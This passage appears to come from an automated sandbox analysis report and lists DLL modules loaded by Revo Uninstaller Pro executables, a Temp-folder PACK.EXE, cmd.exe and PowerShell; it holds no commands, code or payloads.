        Source: C:\Windows\System32\runonce.exe | Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\runonce.exe | Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\grpconv.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\grpconv.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\regsvr32.exe | Section loaded: apphelp.dll
        Source: C:\Windows\System32\regsvr32.exe | Section loaded: aclayers.dll
        Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
        Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc_os.dll
        Source: C:\Windows\System32\regsvr32.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\regsvr32.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\regsvr32.exe | Section loaded: msi.dll
        Source: C:\Windows\System32\regsvr32.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\regsvr32.exe | Section loaded: wldp.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: apphelp.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: dnsapi.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: msi.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: wininet.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: wtsapi32.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: msimg32.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: uxtheme.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: oledlg.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: urlmon.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: rstrtmgr.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: version.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: oleacc.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: winmm.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: iertutil.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: srvcli.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: netutils.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: ncrypt.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: iphlpapi.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: ntasn1.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: msasn1.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: dwmapi.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: sspicli.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: winsta.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: windows.storage.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: wldp.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: kernel.appcore.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: windowscodecs.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: riched32.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: riched20.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: usp10.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: msls31.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | Section loaded: profapi.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: version.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: olepro32.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wsock32.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wtsapi32.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: msi.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: wtsapi32.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: oledlg.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: rstrtmgr.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: version.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: windowscodecs.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: riched32.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: version.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: mpr.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: olepro32.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wininet.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wsock32.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: winmm.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: iphlpapi.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: iphlpapi.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: mpr.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: oleacc.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: usp10.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: uxtheme.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: kernel.appcore.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wtsapi32.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: winsta.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: sxs.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: textshaping.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: textinputframework.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: coreuicomponents.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: coremessaging.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: ntmarta.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: coremessaging.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wintypes.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wintypes.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wintypes.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: dwmapi.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wbemcomn.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: napinsp.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: pnrpnsp.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wshbth.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: nlaapi.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: mswsock.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: dnsapi.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: winrnr.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: fwpuclnt.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: rasadhlp.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: amsi.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: userenv.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: profapi.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: napinsp.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: pnrpnsp.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wshbth.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: nlaapi.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: winrnr.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: fwpuclnt.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: sspicli.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: cryptsp.dll
        Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: <pi-ms-win-core-synch-l1-2-0.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: <pi-ms-win-core-synch-l1-2-0.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: <pi-ms-win-core-localization-l1-2-1.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: dxgidebug.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: sfc_os.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: dwmapi.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: riched20.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: usp10.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: msls31.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: dpapi.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: textshaping.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: textinputframework.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: coreuicomponents.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: coremessaging.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: propsys.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: edputil.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: urlmon.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: iertutil.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: srvcli.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: windows.staterepositoryps.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: appresolver.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: bcp47langs.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: slc.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: sppc.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: onecorecommonproxystub.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: pcacli.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: mpr.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: windows.fileexplorer.common.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: ntshrui.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: cscapi.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: linkinfo.dll
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
